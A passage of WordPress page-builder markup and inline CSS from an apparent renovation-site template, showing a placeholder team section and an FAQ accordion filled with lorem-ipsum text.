top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ec6e65f8-ff22-4968-af3a-cce4cc21b8a3\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f25b9c21-2e8e-4873-9145-526e0c982809\"} -->\n<style type=\"text/css\"> .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f25b9c21-2e8e-4873-9145-526e0c982809 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"68b54430-940b-4d40-99b2-a93a58a6a678\"} -->\n<style type=\"text/css\"> .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-68b54430-940b-4d40-99b2-a93a58a6a678\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"627304db-e6fd-4a57-93f7-a54b4780da61\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-627304db-e6fd-4a57-93f7-a54b4780da61\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">FAQs</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Get every answer<br>from here</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"34ee5663\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Real Estate Law\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022The industry standard\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Unknown printer galley\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Aldus PageMaker including\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-34ee5663 skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-34ee5663 {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"efde8242\",\"title\":\"Real Estate Law\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-efde8242 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Real Estate Law</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"43a5459d\",\"title\":\"The industry standard\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-43a5459d gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">The industry standard</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e85130f1\",\"title\":\"Unknown printer galley\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e85130f1 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Unknown printer galley</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"eb7de836\",\"title\":\"Aldus PageMaker including\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-eb7de836 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Aldus PageMaker including</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus 